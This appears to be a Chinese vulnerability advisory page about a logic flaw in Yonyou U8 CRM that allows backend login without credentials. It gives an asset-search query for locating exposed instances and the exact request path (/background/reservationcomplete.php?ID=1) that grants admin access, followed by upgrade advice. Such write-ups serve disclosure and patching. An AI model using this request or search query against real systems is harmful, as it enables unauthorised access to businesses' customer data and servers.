用友CRM reservationcomplete.php逻辑漏洞登录后台

产品简介

用友CRM(Customer Relationship Management,客户关系管理)是由用友公司开发的一款软件,专门设计用于帮助企业管理与客户相关的业务活动。这款软件通常包括客户信息管理、销售管理、市场营销、客户服务和技术支持等功能。用友CRM的目标是帮助企业改善与客户的关系,提升客户满意度,优化销售和服务流程,从而提高企业的市场竞争力。它适用于各种规模的企业,可以根据不同企业的具体需求进行定制和扩展。

资产测绘

title=="用友U8CRM"

漏洞概述

用友CRM系统在reservationcomplete.php接口处存在逻辑漏洞,攻击者可通过该漏洞直接进去后台,获取后台权限,为后续获取服务器权限做准备。

漏洞复现

访问url:/background/reservationcomplete.php?ID=1

访问后,直接访问主页进入后台

修复建议

升级至最新安全版本

相关推荐
码海踏浪9 分钟前
JMeter 时间函数合集
开发语言·python
麦麦鸡腿堡10 分钟前
Java_反射暴破创建对象与访问类中的成员
java·开发语言
不会c嘎嘎11 分钟前
深入理解QT之信号和槽
开发语言·qt
SunnyDays101111 分钟前
Python 实现 PDF 文档压缩:完整指南
linux·开发语言·python
Cx330❀12 分钟前
《C++ 动态规划》第001-002题:第N个泰波拉契数,三步问题
开发语言·c++·算法·动态规划
神仙别闹13 分钟前
基于Qt5(C++)+SQLite 开发的一个小巧精美的本地音乐播放器
开发语言·c++·qt
差点GDP14 分钟前
C语言常用编译命令和示例
c语言·开发语言
2501_9159090616 分钟前
资源文件混淆在 iOS 应用安全中的实际价值
android·安全·ios·小程序·uni-app·iphone·webview
weixin_3077791316 分钟前
Jenkins Pipeline: Input Step插件详解与实践指南
运维·开发语言·自动化·jenkins·etl
宵时待雨19 分钟前
C语言笔记归纳21:编译与链接
linux·c语言·开发语言·笔记